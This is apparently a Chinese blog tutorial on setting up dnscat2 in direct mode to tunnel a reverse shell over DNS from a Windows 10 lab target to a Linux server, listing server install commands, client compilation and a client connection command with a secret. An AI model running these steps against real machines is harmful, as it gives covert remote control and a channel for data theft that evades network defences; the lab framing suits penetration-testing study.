使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

安鸾彭于晏2024-07-18 22:39
  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
小义_7 小时前
【Kubernetes】(五) pod2
linux·云原生·容器·kubernetes
Azure DevOps7 小时前
Azure DevOps Server:2026年4月份补丁(安装详细步骤)
运维·microsoft·azure·devops
刘某的Cloud7 小时前
docker commit 封装镜像
运维·docker·容器·image
liu****7 小时前
LangGraph-AI应用开发框架(二)
windows·langchain·大模型·工作流·langgraph
哇哦9827 小时前
渗透安全(渗透防御)②
linux·安全·渗透防御
施努卡机器视觉7 小时前
阴极铜机器人剥片:SNK施努卡的双线并行自动化解决方案
运维·机器人·自动化
小冯不疯8 小时前
轻松云数据集成平台:高效系统对接与智能运维
大数据·运维
炜宏资料库8 小时前
智慧能源设备运维管理系统如何建设?
运维·能源
古城小栈8 小时前
Docker 下配置 Pgsql 主从复制详细步骤指南
运维·docker·容器
chao_6666668 小时前
AI coding 代码开发规范
linux·运维·服务器
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free04AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析05GPT-6发布日深度解析-Symphony架构200万Token实战06零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)07一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛08从零部署 Hermes Agent:一只"会成长的 AI 马"保姆级安装教程09从限购到畅通:GLM-5.1 Coding Plan接入攻略10基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南